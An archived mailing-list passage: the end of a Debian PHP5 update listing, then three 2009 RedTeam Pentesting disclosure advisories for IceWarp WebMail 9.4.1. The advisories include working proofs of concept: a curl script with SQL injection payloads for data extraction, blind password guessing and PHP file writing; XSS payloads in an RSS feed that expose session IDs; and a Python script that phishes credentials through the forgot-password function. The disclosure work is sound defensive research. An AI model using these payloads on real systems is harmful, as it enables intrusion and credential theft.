http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 2644668 3c28879e607e30d2e051a78fee458d67 http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 56358 0937bc16c4fe9082a375d822a2115846 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 77028 ddcd7478c58beee78eedcec016645d2c http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 16954 54afa9c0cab6163b1b038e375d18ad00 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 15948 6c79622285b8843e59402289b158c3cb http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 30514 cd522222967b7dfd40fbb6552aa3bae3 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 38122 2cd615c6def56a383db21eaf667f74d5 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 8997068 34060784b3a1d89a411c3af22959931e http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 10984 8de46d226b068f598ab9c28ed5820b3c http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 16060 6ddd8dea6a25532e64d5300edf13967b http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 42312 231368114977880457320bc1438b4f12 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 2557048 9928155dff896c0c08e9b9e57d9c6f53 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 2699146 80469dac8ffe193dcd6872ef49645692 http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 15526 be6fe825489e6c78e77a0c22605d91a9 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 5296 c0f941ac316e9816b6ab48f3157dfee8 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 13996 5b32f9be24b7165897e843cf9b4c3e69 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 5229324 0b50126324846300a57854fbc82d1c63 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 58512 96e39170b492d6d20f7d37bdf99249a7 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 362748 bc860d0b8b98073281425309437b5b77 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 41956 fd9b8facda486c817b5655378070fba9 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 2633632 b3981386d47cfa9c2e49e3bbab9f25d0 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 368902 df32054c14e2f7d51ac8f14668c4bfb5 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 12356 76f361b160f9906ad5f6e440e99a1226 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 5586 21268003a9d85a0a3effde2ec9bc6c72 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 39684 2ef3bbdffa15b0c6bbccd8a5c3c499d8 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 9054456 9e0fee68eae66a9c71e821ac31ee1831 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 28236 5713dbf16dc3decf659c41faaf8de208 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 18602 9a1072857e9ced699b7cb05cfccabc4b http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 9352 3b116cc9b2788c1623351ddb7ce91436 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 37982 483d126a0d45a4b561ad33e08f4df302 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 14186 ee16ed311d1580d82464b4c123beea16 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 36314 0ddf73e77428f2a16c02750fbb3c7467 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 20678 0eebf578e0c80c53adc76bb984ba911b http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 38304 0c0b83646aff55840a0091ebe9162170 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 2696548 f80be6e2dc1225f2ecd2e91df5cdea0f http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 25182 40df367c802650bd173bdc8583db70f0 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_s390.deb Size/MD5 checksum: 73790 eaad8d04bf11abb07788bc37eb43e45a sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 17482 88611ca8b3dd5da77dfd732d671e752b http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 33782 e8df34682e569a177d2145a3613f3c63 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 4814 f3c1ee8b63bde7a27ba6eea1c4a1751d http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 16520 255ccddb387cbdcbd6b1e6577aedc2c7 http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 43948 afa0c628790896178c0bb8e61577f59d http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 13084 a704c8b024c8300c4d5301882cc7bc98 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 4818156 ffeb690f134063de643223da003f8f40 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 2425786 8f9a0a4151b63329f074f9f5b0dfa6a0 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 12328 0121b749e5bc52020a083eb92c0ba70e http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 63028 47b27fee939fe51d6d20dc5ab6e18060 http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 8192 c07f22bccc4d0e6f6cd5bc3e6060a6bb http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 365914 d1c135001df7fc4f7c3e645a7f1d16f6 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 32958 6f79ce6adb69b3d123b3ad30d8429e69 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 34068 89bbf8718b31807276282ce335e2417f http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 32832 4ee6ac773812693aab1ee13dfe4d0413 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 11212 375312647e1b170f131ea47e561ed715 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 5008 2e2b6dcd0b3abb779fe6bbdf5194644f http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 2474234 10cabcad892ff8ba50c939b21e87aa74 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 8379988 7a3e337c215f6751f9c7dc2330be9279 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 49962 faa9ccffb8ee5ed3ae466a450cf10e5d http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 13440 82c0f647a2975869caa27fb989662214 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 24286 cc1a0a4d3bbd41d20e64a8fc4c6862d3 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 365406 0494eb776d482b40f6113b6bd719d8b9 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 24306 87a89e01d39619fd7369c5e424bcef45 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 35952 2543ec38640668a49ba063b0caf9449b http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_sparc.deb Size/MD5 checksum: 2475310 fe539afd738ea4f1d6c8b8e91cfcaa68 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJJ/1YkAAoJECIIoQCMVaAc/ogH/jOBRdmpUxhc3p3wCebGCs+p /1q2h7JSSkUvmdxMX/BLlBrXPFgl0k2iWdDqjXecBswWN5+cuQ4CFOE3RAS8OPbi CBC6Au4FMEB9UTiaah8zM2W1jbOwnk5Dq+Igase+RRNX1xA6zX2kboPGAWMSY/O/ EzZ3r1c0lebA9klBtsenxsQKNtsenr2NVHfDJYSHbizzZ3DkFMsX4eej8L592DXj pskRTgTjT0lKiKN3k+WX9arAqAGU2IeYz4k/LerOogt6r7hJ737rXWK887Gr3rvc V6YKu0rBFZnEvdu6juz2J5w//uLWsrTQJKapTvEZNgNgvZzh0DdLIys1+d9R3rU= =8ODB -----END PGP SIGNATURE----- From release at redteam-pentesting.de Tue May 5 13:56:20 2009 From: release at redteam-pentesting.de (RedTeam Pentesting GmbH) Date: Tue, 5 May 2009 14:56:20 +0200 Subject: [Full-disclosure] [RT-SA-2009-003] IceWarp WebMail Server: SQL Injection in Groupware Component Message-ID: <20090505125620.GH5763@otis.atalante.redteam-pentesting.de> Advisory: IceWarp WebMail Server: SQL Injection in Groupware Component During a penetration test RedTeam Pentesting discovered multiple SQL-Injections in the IceWarp WebMail Server. Attackers that are in control of a user account for the web-based email and groupware components are able to execute arbitrary SQL SELECT statements and therefore read any data from the DBMS that are accessible by the Icewarp eMail Server. Details ======= Product: IceWarp eMail Server / WebMail Server Affected Versions: 9.4.1 Fixed Versions: 9.4.2 Vulnerability Type: SQL Injection Security Risk: high Vendor URL: http://www.icewarp.com/ Vendor Status: notified, fixed version released Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2009-003 Advisory Status: published CVE: CVE-2009-1468 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1468 Introduction ============ "Feature complete yet easy to use, WebMail Server Pro provides feature rich Web 2.0 web-based access to email, calendars, contacts, files and shared data from any computer with browser and internet connection, without the usual configuration hassle. Thanks to advanced technologies and application-like look and feel, Pro suggests it was born to become the ultimate replacement of Outlook and similar desktop mail clients." (from the vendor's homepage) More Details ============ The IceWarp eMail Server's web-based groupware component provides functionality for users to store, for example, contact information, notes, a journal or files. A search form can be used to search for such stored items. When users search, for example, for certain files, using the provided search form, an HTTP POST request containing the search query in XML form is sent from the browser to the PHP script at https://example.com/webmail/server/webmail.php: ----- HTTP POST request ------------------------------------------------ [..] 0 60 EVNTYPE asc (EVNTITLE LIKE '%SQL INJECTION TEST%' OR EVNNOTE LIKE '%SQL INJECTION TEST%') ----- /HTTP POST request ----------------------------------------------- It is evident that SQL expressions are used to find matching items and order the results. Using the information provided within the POST request, two SQL queries are constructed and executed on the database (relevant user-controlled parts marked with a leading ">"): ----- Query 1 ---------------------------------------------------------- Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate, evnstarttime, evntype, evncolor, evncomplete From Event Where (EVNGRP_ID = '3a7e072a3002') And ( ( > (EVNTITLE LIKE '%SQL INJECTION TEST%' OR > EVNNOTE LIKE '%SQL INJECTION TEST%') ) AND evnclass <> 'O' ) And (EvnFolder='Files') Order By > EVNLOCATION asc LIMIT 0,45 ----- /Query 1 --------------------------------------------------------- ----- Query 2 ---------------------------------------------------------- Select Count(EVN_ID) As Count_ From Event Where (EVNGRP_ID = '3a7e072a3002') And ( > (EVNTITLE LIKE '%SQL INJECTION TEST%' OR > EVNNOTE LIKE '%SQL INJECTION TEST%') ) And (EvnFolder='Files') ----- /Query 2 --------------------------------------------------------- Data is only returned from the database to the web application when both queries are syntactically correct. Due to a different nesting level of parentheses around the SQL queries' user-manipulable parts, successful (non-blind) SQL injection requires the use of two elements within the original HTTP POST request. The following examples show the two queries that are executed when the element contains the string "0=1) /* " and the element contains the string "*/)--". User input that is active within an SQL query is marked with a ">", user input that begins or ends a comment is marked with a "+", and application-provided query parts that are now commented out are marked with a "|": ----- Query 1a --------------------------------------------------------- Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate, evnstarttime, evntype, evncolor, evncomplete From Event Where (EVNGRP_ID = '3a7e072a3002') And ( ( > 0=1) + /* part of the element | ) AND | evnclass <> 'O' | ) And | (EvnFolder='Files') Order By + part of the element */ > )-- LIMIT 0,45 ----- /Query 1a -------------------------------------------------------- ----- Query 2a --------------------------------------------------------- Select Count(EVN_ID) As Count_ From Event Where (EVNGRP_ID = '3a7e072a3002') And ( > 0=1) + /* part of the element | ) And | (EvnFolder='Files') ----- /Query 2a -------------------------------------------------------- Note that this method requires a DBMS that allows unbalanced C-style (/**/) comments in its SQL syntax, such as SQLite3 or MySQL < 5.0.51. For other DBMS, blind SQL injection into the first SQL query is another option. Proof of Concept ================ The following shell script can be used to construct a valid search request as mentioned above. It expects a valid session ID and corresponding username as commandline arguments, followed by arguments that are inserted into the and elements of the POST request. ----- sql_inject.sh ---------------------------------------------------- #!/bin/sh sid=$1 uid=$2 orderby=$3 if [ -n "$4" ] ; then sql=$4 else sql="1=0)/*" fi curl --silent -d ' '"$orderby"' '"$sql"' ' https://example.com/webmail/server/webmail.php | \ perl -pe 's/{/\n/g' | grep "result::" | \ sed -e 's/^"VALUE":"result:://' -e 's/"}]}],"ATTRIBUTES":$//' ----- /sql_inject.sh --------------------------------------------------- For DBMS that support unbalanced C-Style comments, data can for example be retrieved from the database as follows: $ ./sql_inject.sh 73aaafec4a8db27af49c4c43bca4ac13 user at example.com \ "*/) UNION SELECT random(),'NULL', ('result::'||ItmFirstname||':'||ItmSurname) FROM ContactItem" Joe:Plumber John:Doe Agent:Smith Jane:Doe Joe:User For other DBMS, blind SQL injection is a possibility. The following example illustrates how a password for a certain user account is retrieved on an installation of the IceWarp eMail server that uses a recent version of MySQL for storing user account information: $ time ./sql_inject.sh \ 73aaafec4a8db27af49c4c43bca4ac13 user at example.com "" \ "1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users WHERE U_Mailbox='user' AND U_Password LIKE 'a%'),SLEEP(5),1)-- " real 0m0.334s user 0m0.053s sys 0m0.007s [...] $ time ./sql_inject.sh \ 73aaafec4a8db27af49c4c43bca4ac13 user at example.com "" \ "1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users WHERE U_Mailbox='user' AND U_Password LIKE 't%'),SLEEP(5),1)-- " real 0m5.441s user 0m0.037s sys 0m0.013s [...] $ time ./sql_inject.sh \ 73aaafec4a8db27af49c4c43bca4ac13 user at example.com "" \ "1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users WHERE U_Mailbox='user' AND U_Password LIKE 'test'),SLEEP(5),1)-- " real 0m5.418s user 0m0.040s sys 0m0.010s Depending on the DBMS configuration, creation of arbitrary files and/or code execution might also be possible. The following example illustrates the creation of a PHP script within the web application's root directory using the SELECT .. INTO DUMPFILE functionality provided by MySQL: $ ./sql_inject.sh a3779402b23fa4acdcba6be907521acb user at example.com "" \ "1=0)) UNION SELECT '','','<?php phpinfo();?>' INTO DUMPFILE 'c:/Program Files/Merak/html/webmail/phpinfo.php'-- " Workaround ========== None. Fix === Upgrade to version 9.4.2. Security Risk ============= The risk of this vulnerability is estimated as high. Depending on the IceWarp eMail Server configuration, and configuration of the DBMS used, attackers authenticated to the web application can leverage it to retrieve, for example, users' contacts, notes or journal entries, obtain user credentials, and/or execute arbitrary code. History ======= 2009-03-23 Vulnerabilities identified during a penetration test 2009-04-01 Meeting with customer and vendor 2009-04-28 CVE number assigned 2009-05-05 Vendor publishes fixed version 2009-05-05 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting is offering individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 Gesch?ftsf?hrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090505/55a80790/attachment.bin From release at redteam-pentesting.de Tue May 5 13:55:52 2009 From: release at redteam-pentesting.de (RedTeam Pentesting GmbH) Date: Tue, 5 May 2009 14:55:52 +0200 Subject: [Full-disclosure] [RT-SA-2009-002] IceWarp WebMail Server: User-assisted Cross Site Scripting in RSS Feed Reader Message-ID: <20090505125551.GG5763@otis.atalante.redteam-pentesting.de> Advisory: IceWarp WebMail Server: User-assisted Cross Site Scripting in RSS Feed Reader During a penetration test, RedTeam Pentesting discovered that the IceWarp WebMail Server is prone to user-assisted Cross Site Scripting attacks in its RSS feed reader. If attackers control or compromise an RSS feed users are subscribed to, they can run arbitrary JavaScript code in the users' browsers by embedding it within the feed. Details ======= Product: IceWarp eMail Server / WebMail Server Affected Versions: 9.4.1 Fixed Versions: 9.4.2 Vulnerability Type: Cross Site Scripting Security Risk: medium Vendor URL: http://www.icewarp.com/ Vendor Status: notified, fixed version released Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2009-002 Advisory Status: published CVE: CVE-2009-1467 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1467 Introduction ============ "Feature complete yet easy to use, WebMail Server Pro provides feature rich Web 2.0 web-based access to email, calendars, contacts, files and shared data from any computer with browser and internet connection, without the usual configuration hassle. Thanks to advanced technologies and application-like look and feel, Pro suggests it was born to become the ultimate replacement of Outlook and similar desktop mail clients." (from the vendor's homepage) More Details ============ Users of the IceWarp WebMail Server can add RSS feeds as folders to their folder list. The parsing of such feeds is done in the PHP file html/webmail/server/inc/rss/rss.php The individual items of an RSS channel are handled in html/webmail/server/inc/rss/item.php In the function getHTML(), the final HTML page for an item is assembled and returned. The "title" and "description" keys correspond to the and <description> elements in the feed, the "href" key to the <link> element: ------------------------------------------------------------------------ 159 public function getHTML(&$aItem) 160 { 161 $aHTML['title'] = $this->subject; 162 $aHTML['href'] = $this->to; 163 $aHTML['description'] = Tools::cleanHTML($this->body,$base); 164 165 $aURL = parse_url($this->to); 166 $aItem['base'] = $aURL['host']; 167 168 @$sHTML = htmlspecialchars( template('inc/templates/rss.tpl',$aHTML) ); 169 170 return $sHTML; 171 } ------------------------------------------------------------------------ Only the description gets sanitised by the cleanHTML() function, "title" and "href" are embedded unmodified into the final HTML page. This means that HTML or JavaScript code embedded in an item's <title> or <link> element of an RSS feed users are subscribed to will be executed as soon as they click on the item to display it. HTML and JavaScript code within the <description> element of an item is sanitised, but the sanitisation can be bypassed in the same way as described in RedTeam Pentesting's advisory rt-sa-2009-001, "IceWarp WebMail Server: Cross Site Scripting in Email View". Attackers have two options for exploiting this vulnerability: First, they can embed malicious code in a feed they control and convince users to subscribe to this feed. Second, they can change RSS feeds the users are already subscribed to by exploiting vulnerabilities in the systems providing these feeds. Proof of Concept ================ The following RSS feed contains JavaScript code in the <title> and <description> elements that displays a message containing the user's session ID. This code gets executed when users click on the item to view it: ------------------------------------------------------------------------ <?xml version="1.0" encoding="UTF-8"?> <rss version="2.0"> <channel> <title>RedTeam Pentesting http://www.redteam-pentesting.de Seeing your network from the attacker's perspective Mon, 16 Apr 2009 05:23:42 +0000 de <script>alert('Title: Your session id is: ' + window.top.sSID);</script> http://www.redteam-pentesting.de/pentest Mon, 16 Apr 2009 05:23:42 +0000 <div o<xml>nmouseover="alert('Description: Your session id is: ' + window.top.sSID)"> RedTeam Pentesting XSS </div> ------------------------------------------------------------------------ Workaround ========== None. Fix === Upgrade to version 9.4.2. Security Risk ============= Attackers who can inject JavaScript code into RSS feeds that users are subscribed to, or who can get users to subscribe to such RSS feeds, can execute any JavaScript code on the users' behalf. This will let them control the web application on a victim user's behalf and access any information accessible to that user, for example emails and files. It can also be used to to steal the users' sessions and hijack their accounts. Therefore the risk is estimated as medium. History ======= 2009-03-23 Vulnerabilities identified during a penetration test 2009-04-01 Meeting with customer and vendor 2009-04-28 CVE number assigned 2009-05-05 Vendor publishes fixed version 2009-05-05 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting is offering individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 Gesch?ftsf?hrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090505/47b2a82e/attachment.bin From release at redteam-pentesting.de Tue May 5 13:57:03 2009 From: release at redteam-pentesting.de (RedTeam Pentesting GmbH) Date: Tue, 5 May 2009 14:57:03 +0200 Subject: [Full-disclosure] [RT-SA-2009-004] IceWarp WebMail Server: Client-Side Specification of "Forgot Password" eMail Content Message-ID: <20090505125702.GI5763@otis.atalante.redteam-pentesting.de> Advisory: IceWarp WebMail Server: Client-Side Specification of "Forgot Password" eMail Content During a penetration test, RedTeam Pentesting discovered that the emails sent by the IceWarp WebMail Server when using the "Forgot Password" function are generated on the client side. Furthermore, the server expands certain keywords in these emails to users' full names, usernames and passwords. This allows for advanced social engineering attacks and the potential disclosure of usernames and passwords. Details ======= Product: IceWarp eMail Server / WebMail Server Affected Versions: 9.4.1 Fixed Versions: 9.4.2 Vulnerability Type: Unauthorised System Message Manipulation Security Risk: medium Vendor URL: http://www.icewarp.com/ Vendor Status: notified, fixed version released Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2009-004 Advisory Status: published CVE: CVE-2009-1469 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1469 Introduction ============ "Feature complete yet easy to use, WebMail Server Pro provides feature rich Web 2.0 web-based access to email, calendars, contacts, files and shared data from any computer with browser and internet connection, without the usual configuration hassle. Thanks to advanced technologies and application-like look and feel, Pro suggests it was born to become the ultimate replacement of Outlook and similar desktop mail clients." (from the vendor's homepage) More Details ============ The IceWarp WebMail Server implements a "Forgot Password" function on the login page. Users who have forgotten their login password can provide their email address to the mail server. It will then check if the email address exists in the system and send the associated user's password to it. The HTTP POST request sent when clicking on the "Forgot Password" page's submit button has a payload similar to the following: ------------------------------------------------------------------------ invalid at example.com Z2JK 3WWY Your password for %EMAIL% Dear %FULLNAME%, your login data for webmail are following: Username: %USERNAME% Password: %PASSWORD% This email was sent to: %EMAIL%, %ALTEMAIL%. ------------------------------------------------------------------------ The message content of the email is specified with the HTTP POST request and not on the server side. It is therefore possible to manipulate the content of the message. The variables between the percent ("%") character are substituted by the system with data from the database. The following variables are recognised: %FULLNAME% Fullname of the user (first name, last name) %USERNAME%, %USER% User name %PASSWORD% Password of the user's account %EMAIL% Email address %ALTEMAIL% Alternative email address %REMOTEIP% Remote IP address of the server By injecting newlines into the subject of the message, it is also possible to add additional headers to the email. These are however not parsed by the mail system and will only appear in the web frontend as headers of the real mail. An example would be to add an additional "To:", "Cc:" or "Bcc:" header. Proof of Concept ================ The following proof of concept code sends an email with a request to reply to the email to renew the account. The injected "Reply-To" header will make the reply go the attacker's email address. The variables in the body will be expanded to the real username and password of the account. If the users leave the original content of the mail intact when replying, the attacker will get the login credentials. ------------------------------------------------------------------------- #! /usr/bin/env python import urllib2, sys conf = { "captcha_uid": "5989688782215156001239966846169", "captcha": "4SJZ Z4GY", "forgot": "user at example.com", "replyto": "attacker at example.com", "server": "http://www.example.com/webmail/server/webmail.php" } data = """ %(forgot)s %(captcha)s Dear %FULLNAME%, your account Username: %USERNAME% Password: %PASSWORD% has expired. To renew the account, please reply to this email leaving the email body intact, so we know the account is still used. Kind regards, the IT department """ % conf req = urllib2.Request(conf['server']) req.add_data(data) res = urllib2.urlopen(req) print repr(res.read()) ------------------------------------------------------------------------- Workaround ========== Do not trust emails even if they contain your valid password. Always check the address an email is sent to when replying. Preferably, do not include your login credentials in unencrypted emails. Fix === Upgrade to version 9.4.2. Security Risk ============= Client-side specification of the email message text, combined with the availability of these variables, make elaborate social engineering attacks possible. Attackers can send emails to users of the email system and fake knowledge of users' full names, usernames and passwords, adding credibility. This makes it more likely for users to comply with any requests made in the email. The risk is therefore regarded as medium. History ======= 2009-03-23 Vulnerabilities identified during a penetration test 2009-04-01 Meeting with customer and vendor 2009-04-28 CVE number assigned 2009-05-05 Vendor publishes fixed version 2009-05-05 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting is offering individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 Gesch?ftsf?hrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : 